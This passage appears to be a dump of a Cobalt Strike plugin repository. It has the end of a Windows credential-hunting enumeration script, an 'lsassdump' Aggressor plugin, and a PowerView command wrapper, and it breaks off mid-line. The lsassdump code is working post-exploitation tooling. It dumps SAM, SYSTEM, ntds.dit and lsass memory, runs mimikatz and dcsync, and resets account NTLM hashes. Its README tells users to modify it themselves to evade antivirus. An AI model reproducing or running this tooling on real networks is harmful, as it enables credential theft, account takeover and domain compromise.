%WINDIR%\System32\config\SYSTEM ECHO %WINDIR%\System32\config\SYSTEM exists. 423 | IF EXIST %WINDIR%\System32\config\RegBack\SYSTEM ECHO %WINDIR%\System32\config\RegBack\SYSTEM exists. 424 | echo. 425 | echo. 426 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] McAffe SiteList.xml ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 427 | cd %ProgramFiles% 2>nul 428 | dir /s SiteList.xml 429 | cd %ProgramFiles(x86)% 2>nul 430 | dir /s SiteList.xml 431 | cd "%windir%\..\Documents and Settings" 2>nul 432 | dir /s SiteList.xml 433 | cd %windir%\..\Users 2>nul 434 | dir /s SiteList.xml 435 | echo. 436 | echo. 
437 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] GPP Password ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 438 | cd "%SystemDrive%\Microsoft\Group Policy\history" 439 | dir /s/b Groups.xml == Services.xml == Scheduledtasks.xml == DataSources.xml == Printers.xml == Drives.xml 440 | cd "%windir%\..\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history" 441 | dir /s/b Groups.xml == Services.xml == Scheduledtasks.xml == DataSources.xml == Printers.xml == Drives.xml 442 | echo. 443 | echo. 444 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] Cloud Creds ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 445 | cd "%SystemDrive%\Users" 446 | dir /s/b .aws == credentials == gcloud == credentials.db == legacy_credentials == access_tokens.db == .azure == accessTokens.json == azureProfile.json 447 | cd "%windir%\..\Documents and Settings" 448 | dir /s/b .aws == credentials == gcloud == credentials.db == legacy_credentials == access_tokens.db == .azure == accessTokens.json == azureProfile.json 449 | echo. 450 | echo. 451 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] AppCmd ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 452 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe 453 | IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO %systemroot%\system32\inetsrv\appcmd.exe exists. 454 | echo. 455 | echo. 456 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] Files an registry that may contain credentials ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 457 | echo [i] Searching specific files that may contains credentials. 458 | echo [?] 
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files 459 | echo Looking inside HKCU\Software\ORL\WinVNC3\Password 460 | reg query HKCU\Software\ORL\WinVNC3\Password 2>nul 461 | echo Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password 462 | reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password 2>nul 463 | echo Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon 464 | reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername" 465 | echo Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP 466 | reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s 2>nul 467 | echo Looking inside HKCU\Software\TightVNC\Server 468 | reg query HKCU\Software\TightVNC\Server 2>nul 469 | echo Looking inside HKCU\Software\SimonTatham\PuTTY\Sessions 470 | reg query HKCU\Software\SimonTatham\PuTTY\Sessions /s 2>nul 471 | echo Looking inside HKCU\Software\OpenSSH\Agent\Keys 472 | reg query HKCU\Software\OpenSSH\Agent\Keys /s 2>nul 473 | cd %USERPROFILE% 2>nul && dir /s/b *password* == *credential* 2>nul 474 | cd ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\.. 
475 | dir /s/b /A:-D RDCMan.settings == *.rdg == SCClient.exe == *_history == .sudo_as_admin_successful == .profile == *bashrc == httpd.conf == *.plan == .htpasswd == .git-credentials == *.rhosts == hosts.equiv == Dockerfile == docker-compose.yml == appcmd.exe == TypedURLs == TypedURLsTime == History == Bookmarks == Cookies == "Login Data" == places.sqlite == key3.db == key4.db == credentials == credentials.db == access_tokens.db == accessTokens.json == legacy_credentials == azureProfile.json == unattend.txt == access.log == error.log == *.gpg == *.pgp == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12 == *.der == *.csr == *.cer == known_hosts == id_rsa == id_dsa == *.ovpn == anaconda-ks.cfg == hostapd.conf == rsyncd.conf == cesi.conf == supervisord.conf == tomcat-users.xml == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == unattend.xml == unattended.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == groups.xml == services.xml == scheduledtasks.xml == printers.xml == drives.xml == datasources.xml == php.ini == https.conf == https-xampp.conf == httpd.conf == my.ini == my.cnf == access.log == error.log == server.xml == SiteList.xml == ConsoleHost_history.txt == setupinfo == setupinfo.bak 2>nul | findstr /v ".dll" 476 | cd inetpub 2>nul && (dir /s/b web.config == *.log & cd ..) 477 | echo. 478 | echo. 479 | if "%long%" == "yes" ( 480 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] REGISTRY WITH STRING pass OR pwd ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 481 | reg query HKLM /f passw /t REG_SZ /s 482 | reg query HKCU /f passw /t REG_SZ /s 483 | reg query HKLM /f pwd /t REG_SZ /s 484 | reg query HKCU /f pwd /t REG_SZ /s 485 | echo. 486 | echo. 487 | echo [i] Iterating through the drives 488 | echo. 489 | for /f %%x in ('wmic logicaldisk get name^| more') do ( 490 | set tdrive=%%x 491 | if "!tdrive:~1,2!" 
== ":" ( 492 | %%x 493 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] FILES THAT CONTAINS THE WORD PASSWORD WITH EXTENSION: .xml .ini .txt *.cfg *.config ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 494 | findstr /s/n/m/i password *.xml *.ini *.txt *.cfg *.config 2>nul | findstr /v /i "\\AppData\\Local \\WinSxS ApnDatabase.xml \\UEV\\InboxTemplates \\Microsoft.Windows.Cloud \\Notepad\+\+\\ vmware cortana alphabet \\7-zip\\" 2>nul 495 | echo. 496 | echo. 497 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] FILES WHOSE NAME CONTAINS THE WORD PASS CRED or .config not inside \Windows\ ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 498 | dir /s/b *pass* == *cred* == *.config* == *.cfg 2>nul | findstr /v /i "\\windows\\" 499 | echo. 500 | echo. 501 | ) 502 | ) 503 | echo. 504 | ) 505 | -------------------------------------------------------------------------------- /lsassdump/README.md: -------------------------------------------------------------------------------- 1 | lsassdump插件 2 | * reg导出SAM 3 | * ntdsutil导出 4 | * mimikatz读取密码 5 | * dcsyncdump 6 | * comsvcsdll_minidump 7 | * vssadmin dump 8 | 9 | 修改用户密码 10 | * setntlm 11 | * changentlm 12 | 13 | 至于杀毒🐎,自己check然后改吧 14 | 15 | ![](img/map.png) 16 | 17 | ![](img/regdump.png) 18 | 19 | ![](img/ntdsutid.png) 20 | 21 | ![](img/dcsync.png) 22 | 23 | ![](img/minidump.png) 24 | 25 | ![](img/vssadmin.png) 26 | 27 | 支持批量操作 28 | 29 | 修改用户密码 30 | ![](img/editpasswd.png) 31 | ![](img/setntlm.png) 32 | -------------------------------------------------------------------------------- /lsassdump/dump.cna: -------------------------------------------------------------------------------- 1 | sub existsadmin{ 2 | if(-isadmin $1){ 3 | btask($1 ,"Dump Lsass Mode:$2 check Administrator Privilege:True"); 4 | return 0; 5 | }else{ 6 | btask($1 ,"Dump Lsass Mode:$2 check Administrator Privilege:False"); 7 | return -1; 8 | } 9 | } 10 | 11 | sub regdump{ 12 | foreach $id ($bid){ 13 | if (existsadmin($id, "regdump") ne -1){ 14 | btask($id, "reg dump SAM,SYSTEM start"); 15 | $outpath 
= $3["file"]; 16 | bshell($id, "reg save HKLM\\SAM $outpath\\sam /y"); 17 | bshell($id, "reg save HKLM\\SYSTEM $outpath\\system /y"); 18 | bshell($id, "dir $outpath | findstr \"sam\""); 19 | bshell($id, "dir $outpath | findstr \"system\""); 20 | } 21 | } 22 | } 23 | 24 | sub ntdsutildump{ 25 | foreach $id ($bid){ 26 | if (existsadmin($id, "ntdsutildump") ne -1){ 27 | btask($id, "ntdsutil dump ntds.dit、SYSTEM"); 28 | $outpath = $3["file"]; 29 | $outpath2 = $3["file2"]; 30 | brm($id, $outpath); #先删一次文件夹避免报错 31 | bmkdir($id, $outpath); 32 | $cmd = "powershell \"ntdsutil.exe 'ac i ntds' 'ifm' 'create full ".$outpath."' q q\"&&move /y \"$outpath\\Active Directory\\ntds.dit\" $outpath2\\ntds.dit&&move /y $outpath\\registry\\SECURITY $outpath2\\SECURITY&&move /y $outpath\\registry\\SYSTEM $outpath2\\SYSTEM"; 33 | bshell($id, $cmd); 34 | brm($id, $outpath); 35 | bshell($id, "dir $outpath2 | findstr \"ntds.dit\""); 36 | bshell($id, "dir $outpath2 | findstr \"SECURITY\""); 37 | bshell($id, "dir $outpath2 | findstr \"SYSTEM\""); 38 | } 39 | } 40 | } 41 | 42 | sub regdump_config{ 43 | $dialog = dialog("reg dump hash", %(file => "C:\\Windows\\Temp"), ®dump); 44 | dialog_description($dialog, "reg导出SAM、System,指定save的路径"); 45 | drow_text($dialog, "file", "OutPath:"); 46 | dbutton_action($dialog, "RUN"); 47 | dialog_show($dialog); 48 | } 49 | 50 | sub ntdsutil_config{ 51 | $dialog = dialog("ntdsutildump", %(file => "C:\\Windows\\Temp\\RaidEnMei", file2 => "C:\\Windows\\Temp"), &ntdsutildump); 52 | dialog_description($dialog, "(有域的环境)ntdsutil导出ntds.dit、SYSTEM,指定路径创建并导出(导出的文件夹要求为空)"); 53 | drow_text($dialog, "file", "OutPath:"); 54 | drow_text($dialog, "file2", "OutPath2:"); 55 | dbutton_action($dialog, "RUN"); 56 | dialog_show($dialog); 57 | } 58 | 59 | sub mimikatzlogonpasswords{ 60 | foreach $id ($bid){ 61 | if(existsadmin($id, "mimikatzlogonpasswords") ne -1){ 62 | btask($id, "Mimikatz LogonPassword"); 63 | bmimikatz($id, "sekurlsa::logonpasswords"); 64 | } 65 | } 66 | } 67 | 68 
| sub dcsyncdump{ 69 | foreach $id ($bid){ 70 | btask($id, "dcsyncdump"); 71 | if(existsadmin($id, "dcsyncdump") ne -1){ 72 | btask($id, "dcsyncdump"); 73 | $domain = $3["domain"]; 74 | $user = $3["user"]; 75 | if($user eq "ALL"){ 76 | bdcsync($id, $domain); 77 | }else{ 78 | bdcsync($id, $domain, $user); 79 | } 80 | } 81 | } 82 | } 83 | 84 | sub dcsyncdump_config{ 85 | $dialog = dialog("dcsyncdump", %(domain => "RaidEnMei.local", user => "ALL"), &dcsyncdump); 86 | dialog_description($dialog, "(有域的环境)进程dcsync dump [user=ALL dump所有用户 | user=Administrator]"); 87 | drow_text($dialog, "domain", "domain:"); 88 | drow_text($dialog, "user", "user:"); 89 | dbutton_action($dialog, "RUN"); 90 | dialog_show($dialog); 91 | } 92 | 93 | sub minidump{ 94 | $idname = $2; 95 | $savepath = $3; 96 | bps($1, lambda({ 97 | local('$pid $name $entry'); 98 | foreach $entry (split("\n", $2)) { 99 | ($name, $null, $pid) = split("\\s+", $entry); 100 | if ($name eq $idname) { 101 | btask($1, "Find Process: $name $pid"); 102 | bshell($1, "powershell \"rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump $pid $savepath full\""); 103 | bshell($1, "dir $savepath"); 104 | break; 105 | } 106 | } 107 | }, $callback => $2)); 108 | } 109 | 110 | sub comsvcsdll_minidump{ 111 | foreach $id ($bid){ 112 | btask($id, "comsvcs.dll minidump"); 113 | if(existsadmin($id, "comsvcs.dll minidump") ne -1){ 114 | minidump($id, $3["processname"], $3["path"]); 115 | } 116 | } 117 | } 118 | 119 | sub comsvcsdll_minidump_config{ 120 | $dialog = dialog("comsvcsdll_dump", %(path => "C:\\Windows\\Temp\\lsass.dmp", processname => "lsass.exe"), &comsvcsdll_minidump); 121 | dialog_description($dialog, "设置保存dump的路径"); 122 | drow_text($dialog, "processname", "processname:"); 123 | drow_text($dialog, "path", "savepath:"); 124 | dbutton_action($dialog, "RUN"); 125 | dialog_show($dialog); 126 | } 127 | 128 | sub vssadmindump{ 129 | foreach $id ($bid){ 130 | btask($id, "vssadmindump"); 131 | if(existsadmin($id, "vssadmindump") 
ne -1){ 132 | bshell($id, "wmic shadowcopy call create Volume='C:\\'&&powershell \"\$vpath=vssadmin list shadows | findstr GLOBALROOT;\$path=\$vpath -split ':';\$sampath=-join(\$path[-1].Trim(),'\\Windows\\System32\\config\\sam');\$systempath=-join(\$path[-1].Trim(),'\\Windows\\System32\\config\\system');\$security=-join(\$path[-1].Trim(),'\\Windows\\System32\\config\\security');cmd /c copy \$sampath C:\\Windows\\Temp\\sam /y;cmd /c copy \$systempath C:\\Windows\\Temp\\system /y;cmd /c copy \$security C:\\Windows\\Temp\\security /y;vssadmin delete shadows /for=c: /quiet\""); 133 | bshell($id, "dir C:\\Windows\\Temp | findstr sam"); 134 | bshell($id, "dir C:\\Windows\\Temp | findstr system"); 135 | bshell($id, "dir C:\\Windows\\Temp | findstr security"); 136 | } 137 | } 138 | } 139 | 140 | 141 | sub setntlm_{ 142 | foreach $id ($bid){ 143 | if(-isadmin $id){ 144 | bmimikatz($id, "lsadump::setntlm /server:$3['domain'] /user:$3['user'] /password:$3['password']"); 145 | }else{ 146 | blog2($id, "[-] $id Not Administrator Privilege"); 147 | } 148 | } 149 | } 150 | 151 | sub changentlm_{ 152 | foreach $id ($bid){ 153 | if(-isadmin $id){ 154 | bmimikatz($id, "lsadump::changentlm /server:$3['domain'] /user:$3['user'] /old:$3['old'] /newpassword:$3['newpassword']"); 155 | }else{ 156 | blog2($id, "[-] $id Not Administrator Privilege"); 157 | } 158 | } 159 | } 160 | 161 | sub changentlm2_{ 162 | foreach $id ($bid){ 163 | if(-isadmin $id){ 164 | bmimikatz($id, "lsadump::changentlm /server:$3['domain'] /user:$3['user'] /oldpassword:$3['oldpassword'] /new:$3['newntlm']"); 165 | }else{ 166 | blog2($id, "[-] $id Not Administrator Privilege"); 167 | } 168 | } 169 | } 170 | 171 | 172 | 173 | sub setntlm{ 174 | $dialog = dialog("setntlm" ,%(bid => $bid ,domain => "WORKGROUP" ,user => "Administrator" ,password => "Hxc123456"), &setntlm_); 175 | dialog_description($dialog, "SetNTLM,基本是攻击者拿到较高权限时才会进行的操作,因此主要靠我们前期的一些用户实体行权限要求:用户拥有指定用户的重置密码"); 176 | drow_text($dialog, "user", "user:"); 177 
| drow_text($dialog, "domain", "domain:"); 178 | drow_text($dialog, "password", "password:"); 179 | dbutton_action($dialog, "RUN"); 180 | dialog_show($dialog); 181 | } 182 | 183 | sub changentlm{ 184 | $dialog = dialog("changentlm" ,%(bid => $bid ,domain => "WORKGROUP" ,user => "Administrator" ,old => "ca69e7f0f02d9156d1616ba6abd395b6" ,newpassword => "Hxc123456"), &changentlm_); 185 | dialog_description($dialog, "需要对目标用户有Change Password权限,但该权限一般是Everyone拥有的,所以基本上拿到目标用户的hash/密码后都可以进行密码更改"); 186 | drow_text($dialog, "user", "user:"); 187 | drow_text($dialog, "domain", "domain:"); 188 | drow_text($dialog, "old", "oldntlm:"); 189 | drow_text($dialog, "newpassword", "newpassword:"); 190 | dbutton_action($dialog, "RUN"); 191 | dialog_show($dialog); 192 | } 193 | 194 | sub changentlm2{ 195 | $dialog = dialog("changentlm" ,%(bid => $bid ,domain => "WORKGROUP" ,user => "Administrator" ,oldpassword => "Hxc123456!" ,newntlm => "ca69e7f0f02d9156d1616ba6abd395b6"), &changentlm2_); 196 | dialog_description($dialog, "需要对目标用户有Change Password权限,但该权限一般是Everyone拥有的,所以基本上拿到目标用户的hash/密码后都可以进行密码更改"); 197 | drow_text($dialog, "user", "user:"); 198 | drow_text($dialog, "domain", "domain:"); 199 | drow_text($dialog, "oldpassword", "oldpassword:"); 200 | drow_text($dialog, "newntlm", "newntlm:"); 201 | dbutton_action($dialog, "RUN"); 202 | dialog_show($dialog); 203 | } 204 | 205 | 206 | 207 | popup beacon_bottom{ 208 | menu "&dump lsass"{ 209 | $bid = $1; 210 | item "®导出SAM"{ 211 | regdump_config($bid); 212 | } 213 | 214 | item "&ntdsutil导出"{ 215 | ntdsutil_config($bid); 216 | } 217 | 218 | item "&mimikatz读取密码"{ 219 | mimikatzlogonpasswords($bid); 220 | } 221 | 222 | item "&dcsyncdump"{ 223 | dcsyncdump_config($bid); 224 | } 225 | 226 | item "&comsvcsdll_minidump"{ 227 | comsvcsdll_minidump_config($bid); 228 | } 229 | 230 | item "&vssadmin dump"{ 231 | vssadmindump($bid); 232 | } 233 | } 234 | 235 | menu "&修改用户密码"{ 236 | item "&SetNtlm修改账户密码"{ 237 | setntlm($bid); 238 | } 239 | 240 | item 
"&ChangNtlm修改用户密码"{ 241 | changentlm($bid); 242 | } 243 | 244 | item "&ChangNtlm恢复用户密码"{ 245 | changentlm2($bid); 246 | } 247 | } 248 | } 249 | -------------------------------------------------------------------------------- /lsassdump/img/dcsync.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/lsassdump/img/dcsync.png -------------------------------------------------------------------------------- /lsassdump/img/editpasswd.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/lsassdump/img/editpasswd.png -------------------------------------------------------------------------------- /lsassdump/img/map.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/lsassdump/img/map.png -------------------------------------------------------------------------------- /lsassdump/img/minidump.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/lsassdump/img/minidump.png -------------------------------------------------------------------------------- /lsassdump/img/ntdsutid.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/lsassdump/img/ntdsutid.png -------------------------------------------------------------------------------- /lsassdump/img/regdump.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/lsassdump/img/regdump.png 
-------------------------------------------------------------------------------- /lsassdump/img/setntlm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/lsassdump/img/setntlm.png -------------------------------------------------------------------------------- /lsassdump/img/vssadmin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/lsassdump/img/vssadmin.png -------------------------------------------------------------------------------- /powerview_cs/README.md: -------------------------------------------------------------------------------- 1 | ## powerview ## 2 | 导入PowerView脚本,和常见的功能使用 3 | ``` 4 | powerview-import 1 导入master分支的powerview.ps1 5 | powerview-import 0 导入dev分支的powerview.ps1 6 | ``` 7 | 8 | 集成常见的命令 9 | ``` 10 | Get-NetDomain 获取当前用户所在域的名称 11 | Get-NetUser 获取所有用户的详细信息 12 | Get-NetDomainController 获取所有域控制器的信息 13 | Get-NetComputer 获取域内所有机器的详细信息 14 | Get-NetPrinter 获取域中所有当前计算机对象的数组 15 | Get-NetOU 获取域内的OU信息 16 | Get-NetGroup 获取所有域内组和组成员的信息 17 | Get-NetGroupMember 获取指定域组中所有当前用户的列表 18 | Get-NetFileServer 根据SPN获取当前域使用的文件服务器信息 19 | Get-NetShare 获取当前域内所有的网络共享信息 20 | Get-DFSshare 获取域上所有分发文件系统共享的列表 21 | Get-NetSubnet 获取域的其他网段 22 | Get-NetSite 获取域内的当前站点 23 | Get-NetDomainTrust 获取当前用户域的所有信任 24 | Get-NetForestTrust 获取与当前用户的域关联的林的所有信任 25 | Find-ForeignUser 枚举在其主域之外的组中的用户 26 | Find-ForeignGroup 枚举域组的所有成员并查找查询域之外的用户 27 | Invoke-MapDomainTrust 尝试构建所有域信任的关系映射 28 | Get-NetLoggedon 获取主动登录到指定服务器的用户 29 | Get-NetLocalGroup 获取一个或多个远程主机上本地组的成员 30 | Get-NetSession 获取指定服务器的会话 31 | Get-NetRDPSession 获取指定服务器的远程连接 32 | Get-NetProcess 获取远程主机的进程 33 | Get-UserEvent 获取指定用户的日志 34 | Get-ADObject 获取活动目录的对象 35 | Get-NetGPO 获取域内所有的组策略对象 36 | Get-NetGPOGroup 获取域中设置”受限组”的所有GPO 37 | Find-GPOLocation 获取用户/组,并通过GPO枚举和关联使其具有有效权限的计算机 38 | 
Find-GPOComputerAdmin 获取计算机并通过GPO枚举确定谁对其具有管理权限 39 | Get-DomainPolicy 获取域默认策略或域控制器策略 40 | Get-DomainSID 返回指定域的SID 41 | Invoke-UserHunter 获取域用户登录的计算机信息及该用户是否有本地管理员权限 42 | Invoke-ProcessHunter 通过查询域内所有的机器进程找到特定用户 43 | Invoke-UserEventHunter 根据用户日志查询某域用户登陆过哪些域机器 44 | Invoke-ShareFinder 在本地域中的主机上查找(非标准)共享 45 | Invoke-FileFinder 在本地域中的主机上查找潜在的敏感文件 46 | Find-LocalAdminAccess 在域上查找当前用户具有本地管理员访问权限的计算机 47 | Find-ManagedSecurityGroups 搜索受管理的活动目录安全组并标识对其具有写访问权限的用户,即这些组拥有添加或删除成员的能力 48 | Get-ExploitableSystem 发现系统可能易受常见攻击 49 | Invoke-EnumerateLocalAdmin 枚举域中所有计算机上本地管理员组的成员 50 | ``` 51 | 52 | ![](img/help.png) 53 | 54 | ![](img/1.png) 55 | 56 | ![](img/2.png) 57 | 58 | ![](img/3.png) 59 | 60 | ![](img/4.png) 61 | 62 | ![](img/5.png) 63 | 64 | ![](img/6.png) 65 | 66 | ![](img/7.png) 67 | -------------------------------------------------------------------------------- /powerview_cs/img/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/powerview_cs/img/1.png -------------------------------------------------------------------------------- /powerview_cs/img/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/powerview_cs/img/2.png -------------------------------------------------------------------------------- /powerview_cs/img/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/powerview_cs/img/3.png -------------------------------------------------------------------------------- /powerview_cs/img/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/powerview_cs/img/4.png 
-------------------------------------------------------------------------------- /powerview_cs/img/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/powerview_cs/img/5.png -------------------------------------------------------------------------------- /powerview_cs/img/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/powerview_cs/img/6.png -------------------------------------------------------------------------------- /powerview_cs/img/7.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/powerview_cs/img/7.jpg -------------------------------------------------------------------------------- /powerview_cs/img/help.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/powerview_cs/img/help.png -------------------------------------------------------------------------------- /powerview_cs/powerview.cna: -------------------------------------------------------------------------------- 1 | ############### 2 | #author:jiushi # 3 | #time:2020/9/30 # 4 | ################# 5 | 6 | alias Get-NetDomain{ 7 | bpowerpick($1, "Get-NetDomain"); 8 | } 9 | 10 | alias Get-NetUser{ 11 | bpowerpick($1, "Get-NetUser"); 12 | } 13 | 14 | alias Get-NetComputer{ 15 | bpowerpick($1, "Get-NetComputer"); 16 | } 17 | 18 | alias Get-NetDomainController{ 19 | bpowerpick($1, "Get-NetDomainController"); 20 | } 21 | 22 | alias Get-NetComputer{ 23 | bpowerpick($1, "Get-NetComputer"); 24 | } 25 | alias Get-NetPrinter{ 26 | bpowerpick($1, "Get-NetPrinter"); 27 | } 28 | alias Get-NetOU{ 29 | 
bpowerpick($1, "Get-NetOU"); 30 | } 31 | alias Get-NetGroup{ 32 | bpowerpick($1, "Get-NetGroup"); 33 | } 34 | alias Get-NetGroupMember{ 35 | bpowerpick($1, "Get-NetGroupMember"); 36 | } 37 | alias Get-NetFileServer{ 38 | bpowerpick($1, "Get-NetFileServer"); 39 | } 40 | alias Get-NetShare{ 41 | bpowerpick($1, "Get-NetShare"); 42 | } 43 | alias Get-DFSshare{ 44 | bpowerpick($1, "Get-DFSshare"); 45 | } 46 | alias Get-NetSubnet{ 47 | bpowerpick($1, "Get-NetSubnet"); 48 | } 49 | alias Get-NetSite{ 50 | bpowerpick($1, "Get-NetSite"); 51 | } 52 | alias Get-NetDomainTrust{ 53 | bpowerpick($1, "Get-NetDomainTrust"); 54 | } 55 | alias Get-NetForestTrust{ 56 | bpowerpick($1, "Get-NetForestTrust"); 57 | } 58 | alias Find-ForeignUser{ 59 | bpowerpick($1, "Find-ForeignUser"); 60 | } 61 | alias Find-ForeignGroup{ 62 | bpowerpick($1, "Find-ForeignGroup"); 63 | } 64 | alias Invoke-MapDomainTrust{ 65 | bpowerpick($1, "Invoke-MapDomainTrust"); 66 | } 67 | alias Get-NetLoggedon{ 68 | bpowerpick($1, "Get-NetLoggedon"); 69 | } 70 | alias Get-NetLocalGroup{ 71 | bpowerpick($1, "Get-NetLocalGroup"); 72 | } 73 | alias Get-NetSession{ 74 | bpowerpick($1, "Get-NetSession"); 75 | } 76 | alias Get-NetRDPSession{ 77 | bpowerpick($1, "Get-NetRDPSession"); 78 | } 79 | alias Get-NetProcess{ 80 | bpowerpick($1, "Get-NetProcess"); 81 | } 82 | alias Get-UserEvent{ 83 | bpowerpick($1, "Get-UserEvent"); 84 | } 85 | alias Get-ADObject{ 86 | bpowerpick($1, "Get-ADObject"); 87 | } 88 | alias Get-NetGPO{ 89 | bpowerpick($1, "Get-NetGPO"); 90 | } 91 | alias Get-NetGPOGroup{ 92 | bpowerpick($1, "Get-NetGPOGroup"); 93 | } 94 | alias Find-GPOLocation{ 95 | bpowerpick($1, "Find-GPOLocation"); 96 | } 97 | alias Find-GPOComputerAdmin{ 98 | bpowerpick($1, "Find-GPOComputerAdmin"); 99 | } 100 | alias Get-DomainPolicy{ 101 | bpowerpick($1, "Get-DomainPolicy"); 102 | } 103 | alias Get-DomainSID{ 104 | bpowerpick($1, "Get-DomainSID"); 105 | } 106 | alias Invoke-UserHunter{ 107 | bpowerpick($1, "Invoke-UserHunter"); 
108 | } 109 | alias Invoke-ProcessHunter{ 110 | bpowerpick($1, "Invoke-ProcessHunter"); 111 | } 112 | alias Invoke-UserEventHunter{ 113 | bpowerpick($1, "Invoke-UserEventHunter"); 114 | } 115 | alias Invoke-ShareFinder{ 116 | bpowerpick($1, "Invoke-ShareFinder"); 117 | } 118 | alias Invoke-FileFinder{ 119 | bpowerpick($1, "Invoke-FileFinder"); 120 | } 121 | alias Find-LocalAdminAccess{ 122 | bpowerpick($1, "Find-LocalAdminAccess"); 123 | } 124 | alias Find-ManagedSecurityGroups{ 125 | bpowerpick($1, "Find-ManagedSecurityGroups"); 126 | } 127 | alias Get-ExploitableSystem{ 128 | bpowerpick($1, "Get-ExploitableSystem"); 129 | } 130 | alias Invoke-EnumerateLocalAdmin{ 131 | bpowerpick($1, "Invoke-EnumerateLocalAdmin"); 132 | } 133 | 134 | 135 | alias powerview-help{ 136 | blog2($1, "本插件集成powerview常用的命令(需要自定义命令的还请powerpick)"); 137 | blog2($1, "powerview-import 导入powerview脚本 (导入分支的时候记得先清空原先导入的)"); 138 | blog2($1, "Get-NetDomain 获取当前用户所在域的名称"); 139 | blog2($1, "Get-NetUser 获取所有用户的详细信息"); 140 | blog2($1, "Get-NetDomainController 获取所有域控制器的信息"); 141 | blog2($1, "Get-NetComputer 获取域内所有机器的详细信息"); 142 | blog2($1, "Get-NetPrinter 获取域中所有当前计算机对象的数组"); 143 | blog2($1, "Get-NetOU 获取域内的OU信息"); 144 | blog2($1, "Get-NetGroup 获取所有域内组和组成员的信息"); 145 | blog2($1, "Get-NetGroupMember 获取指定域组中所有当前用户的列表"); 146 | blog2($1, "Get-NetFileServer 根据SPN获取当前域使用的文件服务器信息"); 147 | blog2($1, "Get-NetShare 获取当前域内所有的网络共享信息"); 148 | blog2($1, "Get-DFSshare 获取域上所有分发文件系统共享的列表"); 149 | blog2($1, "Get-NetSubnet 获取域的其他网段"); 150 | blog2($1, "Get-NetSite 获取域内的当前站点"); 151 | blog2($1, "Get-NetDomainTrust 获取当前用户域的所有信任"); 152 | blog2($1, "Get-NetForestTrust 获取与当前用户的域关联的林的所有信任"); 153 | blog2($1, "Find-ForeignUser 枚举在其主域之外的组中的用户"); 154 | blog2($1, "Find-ForeignGroup 枚举域组的所有成员并查找查询域之外的用户"); 155 | blog2($1, "Invoke-MapDomainTrust 尝试构建所有域信任的关系映射"); 156 | blog2($1, "Get-NetLoggedon 获取主动登录到指定服务器的用户"); 157 | blog2($1, "Get-NetLocalGroup 